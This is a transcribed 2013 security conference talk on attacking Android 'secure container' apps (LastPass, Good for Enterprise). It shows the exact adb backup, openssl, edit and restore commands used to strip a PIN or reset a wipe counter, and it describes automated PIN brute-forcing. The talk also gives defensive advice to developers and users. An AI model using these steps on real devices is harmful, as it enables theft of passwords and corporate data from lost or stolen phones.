@ChrisJohnRiley > whoami

Similar documents

Insecure Internal Storage in Android

Mobile Iron User Guide

Mobile Device Management Solution Hexnode MDM

Salesforce1 Mobile Security Guide

How to Install Applications (APK Files) on Your Android Phone

When enterprise mobility strategies are discussed, security is usually one of the first topics

GO!Enterprise MDM Device Application User Guide Installation and Configuration for BlackBerry

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

Pentesting Android Apps. Sneha Rajguru

GO!Enterprise MDM Device Application User Guide Installation and Configuration for Android

MDM, COPE, BYOD, MAM, MIM, PIM???

Security in Android apps

Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0

Information Systems. Connecting Smartphones to NTU s System

UP L18 Enhanced MDM and Updated Protection Hands-On Lab

GO!Enterprise MDM Device Application User Guide Installation and Configuration for Android with TouchDown

SysAid MDM User Guide for ios

HDDtoGO. User Guide. User Manual Version CoSoSys SRL 2010 A-DATA Technology Co., Ltd. HDDtoGO User Manual

Gladinet Cloud Backup V3.0 User Guide

Total Baby. Backup & Sync Instructions for Version 2.0+

SYNCSHIELD FEATURES. Preset a certain task to be executed. specific time.

Advanced Web Security, Lab

Samsung KNOX User Guide KNOX for Consumers Edition

Security for mobile apps

AirWatch for Android Devices

Using Devices. Chapter 3

Secure Password Managers and Military-Grade Encryption on Smartphones: Oh, Really? Andrey Belenko and Dmitry Sklyarov Elcomsoft Co. Ltd.

Rocket Mail Smartphone Configuration Guide. Version 2.0

GlobalProtect Configuration for IPsec Client on Apple ios Devices

PC/Tablet/Smartphone Security & Password Managers

BlackBerry Link for Windows. Version: User Guide

Note: Support: Never use your TruMobi application for personal use.

Outlook Connector Installation & Configuration groupwaresolution.net Hosted MS Exchange Alternative On Linux

Comodo Mobile Security for Android Software Version 2.5

Reboot, reset, erase, power off, restore - what's the difference?

Pryvate App User Manual

Students Mobile Messaging Registration & Configuration

the cross platform mobile apps dream Click to edit Master title style Click to edit Master text styles Third level Fourth level» Fifth level

FAQ for ipad (ios 5.x)

Generating an Apple Push Notification Service Certificate for use with GO!Enterprise MDM. This guide provides information on...

Installing Logos SSL Certificates on Mobile Devices

Microsoft Outlook Phone Set Up

Setting up your new Live Server Account

Windows Phone 8.1 Mobile Device Management Overview

How to enable Disk Encryption on a laptop

Flexible Identity. OTP software tokens guide. Multi-Factor Authentication. version 1.0

Set Up Instructions

MDM User Guide June 2012

Sophos Mobile Control Administrator guide. Product version: 3.6

Sophos Mobile Control Administrator guide. Product version: 3

Remote Configuration for FileBrowser

ipad Set Up Guide: Staff! 1 of! 20

Cisco AnyConnect VPN for: Windows 8

McAfee Enterprise Mobility Management 11.0 Software

Cobian9 Backup Program - Amanita

Configuring an Android device to access Staff Wi-Fi and .

Specifications. What s Inside The box

Lab 4 In class Hands-on Android Debugging Tutorial

SysAid MDM User Guide for Android

BYOD Guidelines A practical guide for implementing a successful BYOD Management program in an organization of any size.

Weak Spots in Enterprise Mobility Management Dennis Schröder

Office of Information Technology Connecting to Microsoft Exchange User Guide

User Guide. SafeNet MobilePASS for Windows Phone

Product Manual. Mobile Device Managment Version 8.1. Last Updated: 06/07/15

Android App User Guide

Sticky Password 7. Sticky Password 7 is the latest, most advanced, portable, cross platform version of the powerful yet

Mobile Device Management Version 8. Last updated:

Copyright 2013, 3CX Ltd.

Published : License : None

Q. I use a MAC How do I change my password so I can send and receive my ?

Setup your university on your Android smartphone

Mobility Manager 9.5. Users Guide

Online Backup by Mozy. Common Questions

VMware Horizon Workspace Security Features WHITE PAPER

Penetration Testing Android Applications

NovaBACKUP Storage Server User Manual NovaStor / April 2013

BYOD in the Enterprise

Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH

Quick Start Guide. Version R9. English

Cloud Backup Express

Two Factor Authentication (TFA; 2FA) is a security process in which two methods of authentication are used to verify who you are.

Salesforce Classic Guide for iphone

AirWatch for ios Devices

OWA vs. MDM. Once important area to consider is the impact on security and compliance policies by users bringing their own devices (BYOD) to work.

XenMobile Logs Collection Guide

Remote Access Instructions

Exchange ActiveSync (EAS)

WHITE PAPER AUGUST Preventing Security Breaches by Eliminating the Need to Transmit and Store Passwords

White Paper. Anywhere, Any Device File Access with IT in Control. Enterprise File Serving 2.0

Administration Guide. . All right reserved. For more information about Specops Password Sync and other Specops products, visit

NHSmail mobile configuration guide NotifySync V4.7 for Blackberry

Dove User Guide Copyright Virgil Trasca

FileMaker Server 15. Getting Started Guide

Kaseya 2. User Guide. Version 1.0

iphone in Business How-To Setup Guide for Users

Silk Test Testing Mobile Applications

1. Scope of Service. 1.1 About Boxcryptor Classic

Junos Pulse for Google Android

Transcription:

@ChrisJohnRiley > whoami IT Security Analyst / Security Consultant Raiffeisen Informatik GmbH R-IT CERT Team Regular conference speaker DEF CON Bsides Hashdays SecZone blog http://blog.c22.cc Abject Failure (See Life for reference) Chris John Riley 26.11.2013 2

THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING SOCRATES: APOLOGY, 21D Chris John Riley 26.11.2013 3

Why Scenario How Closer Look Making it easy Review Chris John Riley 26.11.2013 5

Chris John Riley 26.11.2013 6

WHY? Chris John Riley 26.11.2013 7

too much information 01100100 01100101 01110010 01110000 01100100 01100101 01110010 01110000 01111001 01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100 Chris John Riley 26.11.2013 9

Chris John Riley 26.11.2013 12

Containers Multiple uses Pa$$w0rd databases Corporate mail containers Secure notes / files... Chris John Riley 26.11.2013 13

Chris John Riley 26.11.2013 15

but Chris John Riley 26.11.2013 16

The device is insecure Chris John Riley 26.11.2013 17

...or worse Chris John Riley 26.11.2013 18

BYOD * * Bring Your Own Disease Chris John Riley 26.11.2013 19

Solution? Chris John Riley 26.11.2013 21

Move the security closer to the data! Chris John Riley 26.11.2013 22

Chris John Riley 26.11.2013 23

but Chris John Riley 26.11.2013 24

I lost my phone! Chris John Riley 26.11.2013 25

314 mobile phones 'stolen in London every day' offenders traced three or four times out of 10 Source: UK Metropolitan Police 01/2013 Chris John Riley 26.11.2013 26

state of Device security Chris John Riley 26.11.2013 27

Chris John Riley 26.11.2013 28

KEEP CALM Chris John Riley 26.11.2013 30

secure containers will save us Chris John Riley 26.11.2013 31

or not Chris John Riley 26.11.2013 32

Chris John Riley 26.11.2013 33

. Sc nario Chris John Riley 26.11.2013 34

Scenario Given physical access to a device What security do secure containers provide temporary access (< 3 minutes) permanent access Chris John Riley 26.11.2013 35

but Chris John Riley 26.11.2013 38

remember Chris John Riley 26.11.2013 39

secure containers will SAVE us Chris John Riley 26.11.2013 40

Chris John Riley 26.11.2013 41

Chris John Riley 26.11.2013 42

G ALS Chris John Riley 26.11.2013 43

TL;DR Chris John Riley 26.11.2013 44

pwn secure containers Chris John Riley 26.11.2013 45

NOT MY G AL Chris John Riley 26.11.2013 46

bypass PIN 1234 device Chris John Riley 26.11.2013 47

r00t the device Chris John Riley 26.11.2013 48

do anything resembling Chris John Riley 26.11.2013 49

Chris John Riley 26.11.2013 50

Chris John Riley 26.11.2013 51

Chris John Riley 26.11.2013 52

HOW? Chris John Riley 26.11.2013 53

keep it simple Chris John Riley 26.11.2013 54

Android Debug Bridge Chris John Riley 26.11.2013 55

ADB Android Debug Bridge Requires USB Debugging Enabled Doesn't require ROOTed device Root grants further access / makes things trivial http://developer.android.com/tools/help/adb.ht Chris John Riley 26.11.2013 56

adb functions Chris John Riley 26.11.2013 57

ADB Android Debug Bridge Allows application side-loading [un]install applications over adb Doesn t require device to be active Can be PIN locked (for some functions) New security implemented in 4.3 http://developer.android.com/tools/help/adb.ht Chris John Riley 26.11.2013 58

ADB Android Debug Bridge adb backup Backup Android device over adb (ICS onwards) -system system data -apk application apk Can backup specific application data individually adb backup com.android.app -f backup.ab http://developer.android.com/tools/help/adb.ht Chris John Riley 26.11.2013 59

ADB Android Debug Bridge adb restore Restore Android backup over adb Restore specific application data individually with or without application (apk) adb restore backup.ab http://developer.android.com/tools/help/adb.ht Chris John Riley 26.11.2013 60

ADB Android Debug Bridge adb pull / push Copy data to / from device over adb Limited access for non-root users no access to application config without root Works on locked devices (PIN Protected) adb pull /sdcard/secret.txt secret.txt http://developer.android.com/tools/help/adb.ht Chris John Riley 26.11.2013 61

ADB Android Debug Bridge adb shell Shell access on device Send keys / taps Limited for non-root users Works on locked devices (PIN Protected) adb shell http://developer.android.com/tools/help/adb.ht Chris John Riley 26.11.2013 62

Supporting Tools openssl w/ zlib support star tar tool w/ added functionality we need Chris John Riley 26.11.2013 63

Chris John Riley 26.11.2013 64

Closer look Chris John Riley 26.11.2013 65

Chris John Riley 26.11.2013 66

lastpass Chris John Riley 26.11.2013 67

lastpass Personal solution (w/ enterprise option) Uses online sync Can be secured with a PIN Can wipe data after 5 false logons Restricts screenshots https://lastpass.com/android Chris John Riley 26.11.2013 69

Can store lastpass.com password So users don't need to type it EVERY time Reduces security Makes it usable! Chris John Riley 26.11.2013 70

Why store the PW? Chris John Riley 26.11.2013 71

_mysecur3l@stp@$$p@$$w0rd1sdab0mb&&&: Easy to remember Impossible to type! Chris John Riley 26.11.2013 72

It's OK though Chris John Riley 26.11.2013 73

You can enable a PIN! Chris John Riley 26.11.2013 74

PIN Security Limited to 4 digits! auto-wipe data after 5 false logons Chris John Riley 26.11.2013 75

PIN == SECURE! Chris John Riley 26.11.2013 76

AndroidManifest.xml Chris John Riley 26.11.2013 78

AndroidManifest.xml <application android:allowbackup= true > Chris John Riley 26.11.2013 79

Default: true Chris John Riley 26.11.2013 80

adb backup com.lastpass.lpandroid f lp.ab Chris John Riley 26.11.2013 81

What good is an.ab file? Chris John Riley 26.11.2013 82

Android Backup (.ab) zlib compressed (kinda) skip header (24 bytes) pipe to openssl w/zlib support dd if=dropbox.ab bs=24 skip=1 openssl zlib -d > dropbox.tar Chris John Riley 26.11.2013 83

LPandroid.xml lastpass.com username laspass.com password (encoded) PIN (encoded) Settings... Chris John Riley 26.11.2013 86

<string name="reprompt_tries"> 0 </string> Chris John Riley 26.11.2013 87

That looks interesting! Chris John Riley 26.11.2013 88

( ) THEORY Chris John Riley 26.11.2013 89

if reprompt_tries < 5: prompt_for_pin() else drop_the_dbass() end Chris John Riley 26.11.2013 90

Theory reprompt_tries as iterator increases till it reaches 5 Sounds reasonable edit the XML and restore it Let's set reprompt_tries to -9999 then ;) Chris John Riley 26.11.2013 91

Proposed Attack Backup app data Edit XML set reprompt_tries to -9999 Repackage Restore Chris John Riley 26.11.2013 92

Chris John Riley 26.11.2013 93

0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/lpandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Chris John Riley 26.11.2013 94

Not the easiest process... Chris John Riley 26.11.2013 95

Chris John Riley 26.11.2013 96

counter++ Chris John Riley 26.11.2013 97

good news Chris John Riley 26.11.2013 98

We get 10,000 tries Chris John Riley 26.11.2013 99

bad news Chris John Riley 26.11.2013 100

We get 10,000 tries Chris John Riley 26.11.2013 101

Let s make it easier Chris John Riley 26.11.2013 102

No PIN > PIN Chris John Riley 26.11.2013 103

<string name="passwordrepromptonactivate">0</string> <string name="pincodeforreprompt"></string> <string name="requirepin">0</string> Chris John Riley 26.11.2013 104

PROFIT! Chris John Riley 26.11.2013 105

Easier Attack Backup app data Edit XML remove PIN Repackage Restore WIN! Chris John Riley 26.11.2013 106

Chris John Riley 26.11.2013 107

for points... Chris John Riley 26.11.2013 108

Persistence Chris John Riley 26.11.2013 109

Persistence Backup LastPass from device A Edit backup to remove PIN Rebuild backup Restore backup to device B Close & restart to re-sync changes from device A Profit? Chris John Riley 26.11.2013 110

...but I RESET my password! Chris John Riley 26.11.2013 111

PROFIT ++ Chris John Riley 26.11.2013 112

... Chris John Riley 26.11.2013 113

GOOD for enterprise Chris John Riley 26.11.2013 114

GOOD Enterprise email solution Email Contacts intranet Browser Secured with a PIN or password enterprise policy Wipes data/device after 10 false logons https://www.good.com Chris John Riley 26.11.2013 115

Adv. security features Double encryption SSL Tunnel + Encrypted contents Full MDM solution Password Policies r00t detection emulator detection advanced detection https://www.good.com Chris John Riley 26.11.2013 116

Lost device (BYOD) Can an attacker prevent secure wipe Can an attacker access cached data Chris John Riley 26.11.2013 117

PROBLEM Chris John Riley 26.11.2013 118

unlike LastPass Chris John Riley 26.11.2013 119

preferences are encrypted Chris John Riley 26.11.2013 120

PROBLEM Chris John Riley 26.11.2013 121

auto-wipe after 10 false logons Chris John Riley 26.11.2013 122

Chris John Riley 26.11.2013 123

Disable PIN Chris John Riley 26.11.2013 124

auto-wipe counter Chris John Riley 26.11.2013 125

brute-force Chris John Riley 26.11.2013 126

but Chris John Riley 26.11.2013 127

AndroidManifest.xml <application android:allowbackup= true > Chris John Riley 26.11.2013 128

THEORY Chris John Riley 26.11.2013 130

Theory Auto-wipe counter Stored IN app data somewhere Chris John Riley 26.11.2013 131

THEORY Chris John Riley 26.11.2013 132

adb restore Chris John Riley 26.11.2013 133

over write auto-wipe counter Chris John Riley 26.11.2013 134

#facepalm Chris John Riley 26.11.2013 135

brute-force Chris John Riley 26.11.2013 136

Naïve Attack Backup app data until good.unlock? Try 9 PINS Restore app data Chris John Riley 26.11.2013 137

PROBLEM Chris John Riley 26.11.2013 138

Chris John Riley 26.11.2013 139

Naïve Attack timing 4 digit PIN est. 4.5 hours* 6 digit PIN est. 18.5 days* 8 digit PIN est. 5 years* * 18.75 ppm ~ 50% keyspace Chris John Riley 26.11.2013 140

Naïve Attack timing 4 lower alphanum est. 31 days* 6 lower alphanum est. 3 years* 8 lower alphanum est. 110 years* * 18.75 ppm ~ 50% keyspace Chris John Riley 26.11.2013 141

Naïve Attack timing 4 mixed alphanum est. 1 year* 6 mixed alphanum est. 46.5 years* 8 mixed alphanum est. 2880 years* * 18.75 ppm ~ 50% keyspace Chris John Riley 26.11.2013 142

Chris John Riley 26.11.2013 143

CONTAINER Device Chris John Riley 26.11.2013 144

CONTAINER Device Chris John Riley 26.11.2013 145

CONTAINER Device Chris John Riley 26.11.2013 146

#facepalm #facepalm Chris John Riley 26.11.2013 147

Chris John Riley 26.11.2013 148

Adv. Attack Automate PIN + restore adb shell input text adb shell input keyevent adb shell input tap Chris John Riley 26.11.2013 151

Minimize keyspace Password Rules No sequenced numbers (e.g. 4567) No duplicate numbers (e.g. 1111) Result Reduced keyspace Chris John Riley 26.11.2013 152

Chris John Riley 26.11.2013 153

PROFIT! Chris John Riley 26.11.2013 154

Chris John Riley 26.11.2013 155

Making it easy Chris John Riley 26.11.2013 156

methodology Common methodology Backup (adb) Extract Examine here be dragons Edit bypass all the things Repack Restore (adb) Chris John Riley 26.11.2013 157

remember this process? Chris John Riley 26.11.2013 158

0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/lpandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Chris John Riley 26.11.2013 159

Say that 10 times fast! Chris John Riley 26.11.2013 160

automation Chris John Riley 26.11.2013 162

Chris John Riley 26.11.2013 163

Chris John Riley 26.11.2013 164

ab_unpacker.py https://github.com/chrisjohnriley/random_code Chris John Riley 26.11.2013 165

ab_packer.py https://github.com/chrisjohnriley/random_code Chris John Riley 26.11.2013 166

Makes 0wning things Chris John Riley 26.11.2013 167

o o 200 / quicker 1000 o / o funner Chris John Riley 26.11.2013 168

Chris John Riley 26.11.2013 169

Chris John Riley 26.11.2013 172

RE VIEW Chris John Riley 26.11.2013 173

secure containers!= SECURE containers Chris John Riley 26.11.2013 174

Physical access Chris John Riley 26.11.2013 175

Chris John Riley 26.11.2013 177

IT Chris John Riley 26.11.2013 178

Developers Chris John Riley 26.11.2013 179

Chris John Riley 26.11.2013 180

android.allowbackup http://developer.android.com/guide/topics/data/backu Chris John Riley 26.11.2013 181

Some devs GET it! Chris John Riley 26.11.2013 182

Chris John Riley 26.11.2013 183

pref files Chris John Riley 26.11.2013 184

Securing Apps Preference files are NOT secret Encrypt preference data ONLY store encrypted passwords No XOR / base64 please Don t TRUST the config HMAC Sign Encrypt Chris John Riley 26.11.2013 185

android backup Chris John Riley 26.11.2013 186

Securing Apps Disallow Android Backup if you don t absolutely need it! <application android:allowbackup= false > Chris John Riley 26.11.2013 187

extra security Chris John Riley 26.11.2013 188

Extra Security USB Debugging Disable app when activated Root makes these hack easier still edit/read preference files on device itself ROOT detection is too basic easy to fool Chris John Riley 26.11.2013 189

users end Chris John Riley 26.11.2013 190

Users Encrypt your device Encrypts ADB backups Need to enter same passcode on backup screen Disable USB Debugging protects against adb pull/push attacks Don t loose your phone ;) Chris John Riley 26.11.2013 191

Chris John Riley 26.11.2013 192

Chris John Riley 26.11.2013 193

Chris John Riley 26.11.2013 194

Question time Chris John Riley 26.11.2013 195

Chris John Riley 26.11.2013 196

Thank you for your attention! Vielen Dank für Ihre Aufmerksamkeit! Raiffeisen Informatik GmbH Lilienbrunngasse 7-9 A-1020 Wien T +43 1/99 3 99-0 F +43 1/99 3 99-1100 E info@r-it.at www.raiffeiseninformatik.at Chris John Riley 26.11.2013 197